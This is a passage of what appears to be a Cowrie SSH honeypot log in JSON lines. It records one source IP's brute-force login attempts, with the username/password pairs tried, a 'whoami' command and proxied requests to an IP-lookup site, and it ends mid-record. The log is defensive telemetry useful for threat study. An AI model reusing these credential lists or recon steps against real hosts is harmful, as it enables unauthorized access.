{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:58.724176Z","src_ip":"212.227.235.229","session":"eff03df05364"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abc123","message":"login attempt [admin/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:04.506021Z","src_ip":"212.227.235.229","session":"eff03df05364"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:06.444934Z","src_ip":"212.227.235.229","session":"eff03df05364"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36568,"dst_ip":"1.2.3.4","dst_port":22,"session":"620eb1f18962","protocol":"ssh","message":"New connection: 212.227.235.229:36568 (1.2.3.4:22) [session: 620eb1f18962]","sensor":"my-vps","timestamp":"2025-08-28T08:04:06.659765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:06.675256Z","src_ip":"212.227.235.229","session":"620eb1f18962"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:06.926758Z","src_ip":"212.227.235.229","session":"620eb1f18962"}
{"eventid":"cowrie.login.success","username":"root","password":"libreelec","message":"login attempt [root/libreelec] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:04:08.120958Z","src_ip":"212.227.235.229","session":"620eb1f18962"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:04:08.584893Z","session":"620eb1f18962"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:04:08.850593Z","src_ip":"212.227.235.229","session":"620eb1f18962"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:09.634310Z","src_ip":"212.227.235.229","session":"620eb1f18962"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60888,"dst_ip":"1.2.3.4","dst_port":22,"session":"032c1b157211","protocol":"ssh","message":"New connection: 212.227.235.229:60888 (1.2.3.4:22) [session: 032c1b157211]","sensor":"my-vps","timestamp":"2025-08-28T08:04:13.842542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:13.858547Z","src_ip":"212.227.235.229","session":"032c1b157211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32087,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa5de04b52d7","protocol":"ssh","message":"New connection: 212.227.235.229:32087 (1.2.3.4:22) [session: fa5de04b52d7]","sensor":"my-vps","timestamp":"2025-08-28T08:04:14.158586Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:14.171504Z","src_ip":"212.227.235.229","session":"032c1b157211"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:04:14.554598Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:04:14.555316Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.login.failed","username":"btf","password":"321start","message":"login attempt [btf/321start] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:16.109171Z","src_ip":"212.227.235.229","session":"032c1b157211"}
{"eventid":"cowrie.login.success","username":"root","password":"09011997*$","message":"login attempt [root/09011997*$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:04:16.879983Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:17.442296Z","src_ip":"212.227.235.229","session":"032c1b157211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35542,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d62f7ce58a7","protocol":"ssh","message":"New connection: 212.227.235.229:35542 (1.2.3.4:22) [session: 3d62f7ce58a7]","sensor":"my-vps","timestamp":"2025-08-28T08:04:19.059029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:19.325423Z","src_ip":"212.227.235.229","session":"3d62f7ce58a7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:04:19.354297Z","src_ip":"212.227.235.229","session":"3d62f7ce58a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62413,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f300d4fceec","protocol":"ssh","message":"New connection: 212.227.235.229:62413 (1.2.3.4:22) [session: 2f300d4fceec]","sensor":"my-vps","timestamp":"2025-08-28T08:04:20.201048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:20.205007Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:04:20.362331Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:04:20.803017Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T08:04:20.803690Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:04:21.149115Z","src_ip":"212.227.235.229","session":"3d62f7ce58a7"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate","message":"login attempt [tate/tate] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:21.281880Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:04:21.403036Z","session":"3d62f7ce58a7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:04:21.656671Z","src_ip":"212.227.235.229","session":"3d62f7ce58a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:21.920166Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:21.934794Z","src_ip":"212.227.235.229","session":"3d62f7ce58a7"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate1","message":"login attempt [tate/tate1] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:22.443974Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:23.518095Z","src_ip":"212.227.235.229","session":"fa5de04b52d7"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate123","message":"login attempt [tate/tate123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:23.605113Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate1234","message":"login attempt [tate/tate1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:24.774827Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.login.failed","username":"tate","password":"tate12345","message":"login attempt [tate/tate12345] failed","sensor":"my-vps","timestamp":"2025-08-28T08:04:26.336495Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:04:27.499310Z","src_ip":"212.227.235.229","session":"2f300d4fceec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45566,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac784f6052dd","protocol":"ssh","message":"New connection: 212.227.235.229:45566 (1.2.3.4:22) [session: ac784f6052dd]","sensor":"my-vps","timestamp":"2025-08-28T08:04:29.134104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:04:29.135597Z","src_ip":"212.227.235.229","session":"ac784f6052dd"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521